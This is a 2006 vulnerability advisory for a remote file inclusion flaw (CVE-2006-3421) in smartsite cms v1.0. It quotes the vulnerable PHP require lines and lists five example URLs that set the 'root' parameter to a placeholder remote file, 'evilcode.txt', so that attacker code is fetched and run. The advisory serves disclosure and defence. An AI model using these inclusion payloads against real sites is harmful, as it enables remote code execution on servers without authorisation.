smartsite cms v1.0 Remote File include

2006-07-10 / 2006-07-11
Credit: CrAsh_oVeR_rIdE
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-3421
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

smartsite cms v1.0 Remote File include ------------------------------------------------- Discovered By CrAsh_oVeR_rIdE Arabian Security Team ------------------------------------------------- site of script:www.smartsitecms.net ------------------------------------------------- Vulnerable: smartsite cms v1.0 ------------------------------------------------- vulnerable code: ---------------------- 1-in comment.php : require($root . "include/inc_foot.php"); --------------------------------------- 2-in /admin/comedit.php : else { require('../include/inc_accessfail.php'); } ?> </div> </div> <?php } else { require($root . "include/inc_adminfail.php"); } --------------------------------------- 3-in /admin/test.php : require($root . "include/inc_adminfooter.php"); --------------------------------------- 4-in /admin/index.php : require($root . "admin/include/inc_adminfooter.php"); --------------------------------------- 5-in /admin/include/inc_adminfoot.php: require($root . "include/inc_footer.php"); --------------------------------------- $root parameter File include ------------------------------------------------------------------------ ----------------------------------------------------------------- vulnerable files : -------------------- comment.php /admin/test.php /admin/index.php /admin/include/inc_adminfoot.php /admin/comedit.php ------------------------------------------------- example: www.example.com/(path)/comment.php?root=http://evilcode.txt? www.example.com/(path)/admin/test.php?root=http://evilcode.txt? www.example.com/(path)/admin/index.php?root=http://evilcode.txt??root=ht tp://evilcode.txt? www.example.com/(path)/admin/include/inc_adminfoot.php?root=http://evilc ode.txt? www.example.com/(path)/admin/comedit.php?root=http://evilcode.txt? -------------------------------------------------- Discovered By CrAsh_oVeR_rIdE E-mail:KARKOR23 (at) hotmail (dot) com [email concealed] Site:www.lezr.com Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALM OKAN3 AND ALL LEZR.COM Member


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top